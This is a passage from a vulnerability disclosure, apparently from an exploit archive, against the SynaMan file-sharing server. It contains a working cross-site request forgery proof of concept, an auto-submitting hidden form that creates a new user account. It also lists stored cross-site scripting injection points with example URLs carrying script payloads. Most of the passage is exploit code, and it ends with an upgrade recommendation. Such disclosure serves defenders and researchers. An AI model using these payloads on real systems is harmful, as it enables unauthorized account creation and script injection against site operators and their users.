width=\"1\" height=\"1\">\r\n</html>\r\n \r\n \r\n# POC 2 #\r\nThe following PoC uses the CSRF vulnerability to create a new user with the details shown.\r\n \r\n<html>\r\n<body>\r\n<form name=\"evilform\" method=\"post\" action=\"http://192.168.1.67:6060/app?operation=mngUsers\">\r\n<input type=\"hidden\" name=\"fullName\" value=\"marlow\"/>\r\n<input type=\"hidden\" name=\"login\" value=\"[email\u00a0protected]\" />\r\n<input type=\"hidden\" name=\"password\" value=\"marlow\" />\r\n<input type=\"hidden\" name=\"operation\" value=\"mngUsers\" />\r\n<input type=\"hidden\" name=\"st\" value=\"saveUser\" />\r\n<input type=\"hidden\" name=\"oldLogin\" value=\"\" />\r\n<input type=\"hidden\" name=\"modifyUser\" value=\"false\" />\r\n</form>\r\n<script type=\"text/javascript\">\r\ndocument.evilform.submit();\r\n</script>\r\n</body>\r\n</html>\r\n \r\n \r\n# STORED XSS VULNERABILITIES # \r\nStored XSS vulnerabilities are present in the following fields:\r\n \r\nManaging Shared Folders > Shared folder name field\r\nExample URL: http://192.168.0.8:6060/app?sharedName=%3Cscript%3Ealert%28%22Hello1%22%29%3C%2Fscript%3E&selectedPath=C%3A\\&publicRead=1&publicWrite=1&operation=mngFolders&st=addFolder\r\n \r\nManage Users > Add a new user > User's name field and Email/Login field\r\nExample URL: POST request\r\n \r\nAdvanced Configuration > Partial Branding > Main heading field and Sub heading field\r\nAffects all users on all pages, pre and post authentication\r\nExample URL: POST request\r\n \r\nDiscovery Wizard > Discovery Service Signup > One-Word name\r\nExample URL: http://192.168.0.8:6060/app?oneword=%3Cscript%3Ealert%28%22Marlow%22%29%3C%2Fscript%3E&x=35&y=21&operation=discovery&st=checkAvailability\r\n \r\n \r\n# MITIGATION #\r\nUpgrade to the latest build of SynaMan, available from the link shown.\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/23613"}]}